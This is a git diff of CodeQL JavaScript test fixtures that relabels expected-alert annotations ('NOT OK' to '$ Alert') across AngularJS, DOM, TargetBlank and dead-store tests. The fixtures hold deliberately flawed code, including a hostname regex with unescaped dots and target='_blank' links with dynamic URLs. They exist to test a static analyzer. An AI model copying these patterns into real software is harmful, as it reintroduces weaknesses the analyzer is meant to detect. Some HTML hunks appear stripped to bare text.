"https://example.com/foo/*/bar", // OK - "https://example.com/foo/**/bar", // OK - "https://example.com/?**", // OK - "https://example.com/?**://example.com", // OK + "https://example.com", + "https://example.com/**", + "https://example.com/*", + "https://example.com/foo/*", + "https://example.com/foo/**", + "https://example.com/foo/*/bar", + "https://example.com/foo/**/bar", + "https://example.com/?**", + "https://example.com/?**://example.com", "https://*.example.com", // not flagged: - /http:\/\/www.example.org/g // BAD (exploit http://wwwaexample.org (dots are not escaped)) + /http:\/\/www.example.org/g // $ Alert - (exploit http://wwwaexample.org (dots are not escaped)) ]); }); diff --git a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js index 65d3e74ceef0..629b62d5b08e 100644 --- a/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/MissingExplicitInjection/missing-explicit-injection.js @@ -1,27 +1,27 @@ (function(){ - function injected1(name){} // NOT OK + function injected1(name){} // $ Alert angular.module('app1').controller('controller1', injected1); - function injected2(name){} // OK + function injected2(name){} injected2.$inject = ['name']; angular.module('app2').controller('controller2', injected2); - function injected3(name){} // OK + function injected3(name){} angular.module('app3').controller('controller3', ['name', injected3]); - angular.module('app4').controller('controller4', function(){}); // OK + angular.module('app4').controller('controller4', function(){}); - angular.module('app5').controller('controller5', function(name){}); // NOT OK + angular.module('app5').controller('controller5', function(name){}); // $ Alert - function injected6(){} // OK + function injected6(){} angular.module('app6').controller('controller6', injected6); - function notInjected7(name){} // OK + function notInjected7(name){} var obj7 = { controller: notInjected7 }; - function injected8(name){} // OK (false negative: we do not track through properties) + function injected8(name){} // OK - false negative: we do not track through properties var obj8 = { controller: injected8 }; @@ -29,14 +29,14 @@ var $injector = angular.injector(); - function injected9(name){} // NOT OK + function injected9(name){} // $ Alert $injector.invoke(injected9) - function injected10(name){} // OK + function injected10(name){} injected10.$inject = ['name']; $injector.invoke(injected10) - function injected11(name){} // OK + function injected11(name){} $injector.invoke(['name', injected11]) })(); diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js index 942a9ab1239e..9987e60d0ea5 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/repeated-injection.js @@ -1,36 +1,36 @@ (function(){ - function $Injected1(name){} // OK + function $Injected1(name){} $Injected1.$inject = ['name']; angular.module('app1').controller('controller1', $Injected1); - function $Injected2(name){} // NOT OK + function $Injected2(name){} // $ Alert $Injected2.$inject = ['name']; angular.module('app2').controller('controller2', ['name', $Injected2]); - function $Injected3(name){} // NOT OK + function $Injected3(name){} // $ Alert $Injected3.$inject = ['name']; $Injected3.$inject = ['name']; angular.module('app3').controller('controller3', $Injected3); - function not$Injected4(name){} // OK + function not$Injected4(name){} angular.module('app4').controller('controller4', not$Injected4); - function not$Injected5(name){} // OK + function not$Injected5(name){} angular.module('app5').controller('controller5', ['name', not$Injected5]); - function $Injected6(name){} // OK (because it never becomes registered) + function $Injected6(name){} // OK - because it never becomes registered $Injected6.$inject = ['name']; $Injected6.$inject = ['name']; - function not$Injected7(name){} // OK + function not$Injected7(name){} angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', ['name', not$Injected7]); angular.module('app7').controller('controller7', not$Injected7); - angular.module('app8').controller('controller8', function inline8(name){}); // OK + angular.module('app8').controller('controller8', function inline8(name){}); - angular.module('app9').controller('controller9', ['name', function inline9(name){}]); // OK + angular.module('app9').controller('controller9', ['name', function inline9(name){}]); - function $Injected10(name){ // NOT OK (alert formatting for multi-line function) + function $Injected10(name){ // $ Alert - alert formatting for multi-line function } $Injected10.$inject = ['name']; angular.module('app10').controller('controller10', ['name', $Injected10]); diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js index f35cc62947ed..14e94d23d6d8 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/unused-angular-dependency.js @@ -1,28 +1,28 @@ (function(){ - function f1(used2, unused5) {used2;} // OK (suppressed by js/unused-parameter) + function f1(used2, unused5) {used2;} // OK - suppressed by js/unused-parameter // this function avoid suppression from js/unused-parameter by explicitly targeting one its weaknesses - function f2(unused7, used3) {used3;} // NOT OK + function f2(unused7, used3) {used3;} // $ Alert this.f2 = f2; angular.module('app1', []) .run(function() {}) - .run(function(unused1) {}) // OK (suppressed by js/unused-parameter) - .run(function(unused2, unused3) {}) // OK (suppressed by js/unused-parameter) - .run(function(used1, unused4) {used1;}) // OK (suppressed by js/unused-parameter) + .run(function(unused1) {}) // OK - suppressed by js/unused-parameter + .run(function(unused2, unused3) {}) // OK - suppressed by js/unused-parameter + .run(function(used1, unused4) {used1;}) // OK - suppressed by js/unused-parameter .run(f1) - .run(["unused6", function() {}]) // NOT OK + .run(["unused6", function() {}]) // $ Alert .run(f2) - .run(["used2", "unused9", function(used2) {}]) // NOT OK - .run(["unused10", "unused11", function() {}]) // NOT OK - .run(["used2", "unused12", function(used2) { // NOT OK (alert formatting for multi-line function) + .run(["used2", "unused9", function(used2) {}]) // $ Alert + .run(["unused10", "unused11", function() {}]) // $ Alert + .run(["used2", "unused12", function(used2) { // $ Alert - alert formatting for multi-line function }]) ; })(); angular.module('app2') .directive('mydirective', function() { return { - link: function (scope, element, attrs) { // OK + link: function (scope, element, attrs) { } }; }); diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html index 6e81b0da32a4..d1049d6bf1d9 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst.html @@ -4,13 +4,12 @@ - - Help + Help - + Help diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html index 485af478d186..6a4f04ba2e1e 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst2.html @@ -1,4 +1,3 @@
- - Help + Help
diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html index e461a5d795bc..0111acde5e8a 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/tst_fragment.html @@ -1,4 +1,3 @@ - - Help + Help diff --git a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js index 877069be03d8..b6497788dd2b 100644 --- a/javascript/ql/test/query-tests/Comments/TodoComments/tst.js +++ b/javascript/ql/test/query-tests/Comments/TodoComments/tst.js @@ -1,2 +1,2 @@ -// OK + // if you want a specific version so specifiy it in object below : version=XXX diff --git a/javascript/ql/test/query-tests/DOM/Alert/alert.js b/javascript/ql/test/query-tests/DOM/Alert/alert.js index 04b0c2e44f2b..dee66a1c186a 100644 --- a/javascript/ql/test/query-tests/DOM/Alert/alert.js +++ b/javascript/ql/test/query-tests/DOM/Alert/alert.js @@ -1,4 +1,4 @@ -alert("hi!"); // NOT OK -x.alert("hi!"); // OK -new alert(); // OK -function alert() { } // OK +alert("hi!"); // $ Alert +x.alert("hi!"); +new alert(); +function alert() { } diff --git a/javascript/ql/test/query-tests/DOM/HTML/tst.js b/javascript/ql/test/query-tests/DOM/HTML/tst.js index df60053b8b93..aec3870ab04d 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/tst.js +++ b/javascript/ql/test/query-tests/DOM/HTML/tst.js @@ -1,25 +1,19 @@ -// OK: we don't know whether the two elements are added to the same document +// OK - we don't know whether the two elements are added to the same document var div1 =
; var div2 =
; -// not OK -Semmle; +Semmle; // $ Alert -// not OK -Semmle; +Semmle; // $ Alert -// not OK -
; +
; // $ Alert
; -// not OK -Semmle; +Semmle; // $ Alert + -// OK
; -// not OK -var div3 =
; +var div3 =
; // $ Alert -// not OK -var div4 =
; +var div4 =
; // $ Alert diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js index 1f1e43ab1550..38ec3b464087 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/tst.js @@ -1,7 +1,7 @@ function foo() { return "noopener noreferrer"; } var o = { rel: "noopener noreferrer "}; -// OK + Example; Example; Example; @@ -9,42 +9,39 @@ var o = { rel: "noopener noreferrer "}; Example; Example; -// OK, because of constant URL +// OK - because of constant URL Example; Example; Example; -// NOT OK, because of dynamic URL -Example; +Example; // $ Alert - because of dynamic URL Example; Example; function f() { - // OK + var a1 = $("", { href: "http://example.com" }); a1.attr("target", "_blank"); - // OK + var a2 = $("", { href: "http://example.com" }); a2.attr("target", "_blank"); a2.attr(computedName(), "noopener"); - // NOT OK - var a3 = $("", { href: "{{X}}" }); + var a3 = $("", { href: "{{X}}" }); // $ Alert a3.attr("target", "_blank"); - // OK + var a4 = $(""); a4[f()] = g(); a4.attr("target", "_blank"); - // NOT OK - var a5 = $(""); + var a5 = $(""); // $ Alert a5.attr("href", g()); a5.attr("target", "_blank"); } -// OK, because of dynamic URL with fixed host +// OK - because of dynamic URL with fixed host Example; Example; Example; @@ -52,20 +49,20 @@ function f() { Example; Example; -// OK, because of dynamic URL with relative path +// OK - because of dynamic URL with relative path Example; Example; Example; Example; Example; -// OK, Flask application with internal links +// OK - Flask application with internal links Example; Example; Example; -// OK, nunjucks template +// OK - nunjucks template Example; -// OK, Django application with internal links +// OK - Django application with internal links Example diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js index c381f60bc272..356f0e111a06 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/tst.js @@ -1,10 +1,10 @@ function f() { if (arguments[0].isArray()) - arguments = arguments[0]; // NOT OK + arguments = arguments[0]; // $ Alert } function g(x, y) { - var arguments = [y, x]; // NOT OK + var arguments = [y, x]; // $ Alert } (function (){ diff --git a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts index d69f8eca109b..855c23cdb118 100644 --- a/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/ArgumentsRedefined/types.d.ts @@ -1,3 +1,3 @@ -declare function ambientArguments(arguments: string[]): string; // OK +declare function ambientArguments(arguments: string[]): string; -declare function ambientArgumentsVarArgs(...arguments: string[]): string; // OK +declare function ambientArgumentsVarArgs(...arguments: string[]): string; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js index 93bb382719f5..5a8866778884 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/classes.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -class C {} +class C {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js index 5f022c603b78..3997e1366e7f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/const6.js @@ -1,4 +1,4 @@ -// OK: `const` is block scoped in ECMAScript 2015 +// OK - `const` is block scoped in ECMAScript 2015 function f() { { const val = 1; diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js index e23c770f2ad1..130f0278d657 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/functions.js @@ -1,4 +1,3 @@ const C = 45; -// NOT OK -function C() {} +function C() {} // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js index 929a95754f81..97886fd35f0f 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/other.js @@ -1,2 +1,2 @@ -// OK + const s = "there"; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js index c68d2380e017..b53a987d8a4e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/tst.js @@ -1,23 +1,19 @@ const x = 23, y = 42; -// NOT OK -x = 42; +x = 42; // $ Alert -// NOT OK -y = 23; +y = 23; // $ Alert -// NOT OK -var y = -1; +var y = -1; // $ Alert -// NOT OK -++x; +++x; // $ Alert var z = 56; -// OK + z = 72; -// OK + const s = "hi"; (function (){ diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js index 00ca7e51f7cf..c1060f0280ab 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/tst.js @@ -1,12 +1,11 @@ for (var iter in Iterator(aExtraHeaders)) { - // NOT OK - var key = iter[0], key = iter[1]; + var key = iter[0], key = iter[1]; // $ Alert xhr.setRequestHeader(key, value); } -// OK + var tmp = f(), tmp = tmp + 19; -// OK + var a, b, a = 42; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js index 6628880d6c55..7f06809d2f3f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/tst.js @@ -1,31 +1,30 @@ -// NOT OK -g = 23; +g = 23; // $ Alert + -// OK h = 23; alert(h); -// OK + uid = 0; function incr() { return uid++; } -// OK + function foo() { var x; x = 0; } -// OK + onload = function() {} -// OK + global = 42; -// OK + prop = 42; -// OK + /*global otherGlobal*/ otherGlobal = 56; \ No newline at end of file diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts index c97993c88a51..3dfc6b0e2e54 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedFieldNames.ts @@ -1,11 +1,11 @@ import dummy from 'dummy'; -var key1 = "key1"; // OK +var key1 = "key1"; export class NoConstructor { [key1] = 4; } -var key2 = "key2"; // OK +var key2 = "key2"; export class WithConstructor { [key2] = 4; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts index 90199399794d..2f93aba1b9c7 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/computedInterfaceProperty.ts @@ -1,16 +1,16 @@ -import { Foo } from "./exportSymbol" // OK +import { Foo } from "./exportSymbol" export interface FooMap { - [Foo]: number; // OK + [Foo]: number; } -const Bar = "Bar"; // OK +const Bar = "Bar"; export interface BarMap { [Bar]: number; } -const Baz = "Baz"; // OK +const Baz = "Baz"; if (false) { Baz; @@ -18,7 +18,7 @@ if (false) { function getBaz(): typeof Baz { return null; } -class C {} // OK +class C {} if (false) { C; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts index 6481a749c40c..007bf441d6df 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultClass.ts @@ -1,5 +1,5 @@ -var C1 = global.C1; // OK -var C2 = global.C2; // OK +var C1 = global.C1; +var C2 = global.C2; class C extends C1 {} export default class extends C2 {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts index 5c6b48f8796c..c8dba3d68896 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/exportDefaultFunction.ts @@ -1,3 +1,3 @@ -var C1 = global.C1; // OK +var C1 = global.C1; export default function(x=C1) {} diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js index eab95b4787f6..68b79aac8e68 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/extends.js @@ -1,4 +1,4 @@ -const React = require('react'); // OK: used in `extends` clause below +const React = require('react'); // OK - used in `extends` clause below class Foo extends React.Component { } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js index da26a3557ade..8e923b565ee2 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/for-of-continue.js @@ -2,7 +2,7 @@ function f() { let y = false; for (const x of [1, 2, 3]) { if (x > 0) { - y = true; // OK + y = true; continue; } return; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts index 4335cd3880aa..3d00634499f8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/namespace.ts @@ -9,5 +9,5 @@ namespace a.b.q { registerSomething(c); - function foo() {} // OK + function foo() {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts index d2be60c12874..255c80093466 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/overload.ts @@ -1,13 +1,13 @@ export function foo() { - function bar(x: number): number; // OK - function bar(x: string): string; // OK - function bar(x: any) { // OK + function bar(x: number): number; + function bar(x: string): string; + function bar(x: any) { return x; } - function baz(x: number): number; // OK - function baz(x: string): string; // OK - function baz(x: any) { // NOT OK, overwritten before use + function baz(x: number): number; + function baz(x: string): string; + function baz(x: any) { // $ Alert - overwritten before use return x; } baz = (x) => x; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js index f19b1656da23..13e260a5de0e 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst.js @@ -1,17 +1,15 @@ function f() { - // OK: initialization to default value + // OK - initialization to default value var x = null, y = undefined, z; x = {}; - // NOT OK - y = 23; + y = 23; // $ Alert y = 42; for (var p in x) y+p; - // OK: assignment to global + // OK - assignment to global global = 42; - // NOT OK - var a = 23; a = 42; - // OK: captured variable + var a = 23; a = 42; // $ Alert + // OK - captured variable var b = 42; return function() { return b%2 @@ -20,14 +18,14 @@ function f() { function g() { var x; - // OK + x = 23, x += 19; - // OK + var y = 42; } function h() { - // OK + var x = false; try { this.mayThrow(); @@ -37,7 +35,7 @@ function h() { } function k(data) { - // OK + for(var i=0;i .5) - // OK + i = 23; } } @@ -87,11 +85,11 @@ function s() { var container = document.createElement("div"), div = document.createElement("div"); doStuffWith(container, div); - // OK + container = div = null; } -// OK: the function expression could be made anonymous, but it's not +// OK - the function expression could be made anonymous, but it's not // worth flagging this as a violation defineGetter(req, 'subdomains', function subdomains() { var hostname = this.hostname; @@ -103,7 +101,7 @@ defineGetter(req, 'subdomains', function subdomains() { return subdomains.slice(offset); }); -// OK: assigning default values +// OK - assigning default values function t() { var x; x = false; @@ -112,7 +110,7 @@ function t() { x = 42; return x; } -// OK: unnecessary initialisation as type hint +// OK - unnecessary initialisation as type hint function u() { var x; x = []; @@ -120,7 +118,7 @@ function u() { x = 42; return x; } -// OK: assigning `undefined` +// OK - assigning `undefined` function v() { var x; x = void 0; @@ -134,7 +132,7 @@ function v() { return x; } -// OK: assignments in dead code not flagged +// OK - assignments in dead code not flagged !function() { return; var x; @@ -159,7 +157,7 @@ function v() { }); (function() { - let [x] = [0], // OK, but flagged due to destructuring limitations + let [x] = [0], // $ SPURIOUS: Alert - flagged due to destructuring limitations y = 0; x = 42; y = 87; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js index 55cff458fca5..0b99d597f477 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst2.js @@ -1,5 +1,5 @@ function outer(b) { - // OK + let addSubdomain = false; if (x) { @@ -16,14 +16,13 @@ function outer(b) { } function f(event) { - // OK + var message = event.data; eme.init().then(() => NativeInfo.processApp('install', message.id)); } function g() { - // NOT OK - let x = 23; + let x = 23; // $ Alert { x = 42; } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js index 91a09ed03d7d..396ba397e55f 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3.js @@ -1,2 +1 @@ -// NOT OK -exports = module.exports = { a: 23 }; +exports = module.exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js index ca9ae499600f..918b117bf273 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/tst3b.js @@ -1,2 +1 @@ -// NOT OK -module.exports = exports = { a: 23 }; +module.exports = exports = { a: 23 }; // $ Alert diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js index 43db65532a09..784cb1ffc328 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/accessors.js @@ -1,7 +1,7 @@ class C { - static get foo() {} // OK - static set foo(v) {} // OK + static get foo() {} + static set foo(v) {} - get bar() {} // OK - set bar(v) {} // OK + get bar() {} + set bar(v) {} } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js index c4b70604781d..3bd03c882ef8 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/exports.js @@ -1,3 +1,3 @@ var exports = module.exports; -exports.answer = "yes"; // NOT OK +exports.answer = "yes"; // $ Alert exports.answer = "no"; diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts index a2b922684dda..8be98d94dd00 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/fieldInit.ts @@ -1,5 +1,5 @@ class C { - f; // OK + f; constructor() { this.f = 5; @@ -7,7 +7,7 @@ class C { } class D { - f = 4; // NOT OK + f = 4; // $ Alert constructor() { this.f = 5; @@ -15,7 +15,7 @@ class D { } class G { - constructor(public h: string) { // NOT OK + constructor(public h: string) { // $ Alert this.h = h; } } diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js index 282f6bc7f4aa..6edb03fb4a67 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/real-world-examples.js @@ -2,7 +2,7 @@ var o = f1(); while (f2()) { if (f4()) { - o.p = 42; // NOT OK + o.p = 42; // $ Alert break; } f5(); @@ -12,8 +12,8 @@ (function(){ var o = f1(); - o.p1 = o.p1 += 42; // NOT OK - o.p2 -= (o.p2 *= 42); // NOT OK + o.p1 = o.p1 += 42; // $ Alert + o.p2 -= (o.p2 *= 42); // $ Alert }); (function(){ @@ -26,7 +26,7 @@ f3(); } catch (e) { f4(); - o.p = 42; // NOT OK + o.p = 42; // $ Alert } } o.p = 42; @@ -35,5 +35,5 @@ (function(){ var o = f1(); - o.p = f2() ? o.p = f3() : f4(); // NOT OK + o.p = f2() ? o.p = f3() : f4(); // $ Alert }); diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js index 39db5056b77b..26246c9cbf14 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfProperty/tst.js @@ -1,26 +1,26 @@ (function(){ var o = {}; - o.pure1 = 42; // NOT OK + o.pure1 = 42; // $ Alert o.pure1 = 42; - o.pure2 = 42; // NOT OK + o.pure2 = 42; // $ Alert o.pure2 = 43; o.impure3 = 42; f(); o.impure3 = 42; - o.pure4 = 42; // NOT OK + o.pure4 = 42; // $ Alert 43; o.pure4 = 42; o.impure5 = 42; o.impure5 = f(); - o.pure6 = f(); // NOT OK + o.pure6 = f(); // $ Alert o.pure6 = 42; - o.pure7 = 42; // NOT OK + o.pure7 = 42; // $ Alert if(x){} o.pure7 = 42; @@ -73,7 +73,7 @@ o15.pure15_aliasWrite = 42; var o16 = x? o: null; - o.pure16_simpleAliasWrite = 42; // NOT OK + o.pure16_simpleAliasWrite = 42; // $ Alert o16.pure16_simpleAliasWrite = 42; var o17 = { @@ -82,31 +82,31 @@ } // DOM - o.clientTop = 42; // OK + o.clientTop = 42; o.clientTop = 42; - o.defaulted1 = null; // OK + o.defaulted1 = null; o.defaulted1 = 42; - o.defaulted2 = -1; // OK + o.defaulted2 = -1; o.defaulted2 = 42; var o = {}; - o.pure18 = 42; // NOT OK - o.pure18 = 42; // NOT OK + o.pure18 = 42; // $ Alert + o.pure18 = 42; // $ Alert o.pure18 = 42; var o = {}; - Object.defineProperty(o, "setter", { // OK + Object.defineProperty(o, "setter", { set: function (value) { } }); o.setter = ""; - var o = { set setter(value) { } }; // OK + var o = { set setter(value) { } }; o.setter = ""; var o = { - set accessor(value) { }, // OK + set accessor(value) { }, get accessor() { } }; @@ -115,24 +115,24 @@ o.setter = 87; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // NOT OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: getInitialValue()}) // $ Alert o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK, default value + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1, value: undefined}) // OK - default value o.prop = 42; var o = {}; - Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) // OK + Object.defineProperty(o, "prop", {writable:!0,configurable:!0,enumerable:!1}) o.prop = 42; var o = {}; - o.pure19 = 42; // OK + o.pure19 = 42; o.some_other_property = 42; o.pure19 = 42; var o = {}; - o.pure20 = 42; // OK + o.pure20 = 42; some_other_obj.some_other_property = 42; o.pure20 = 42; }); diff --git a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js index bdb76a070b7d..1e53a3a4a0f0 100644 --- a/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js +++ b/javascript/ql/test/query-tests/Declarations/DeclBeforeUse/jslint.js @@ -1,8 +1,8 @@ /*global w, x:true*/ 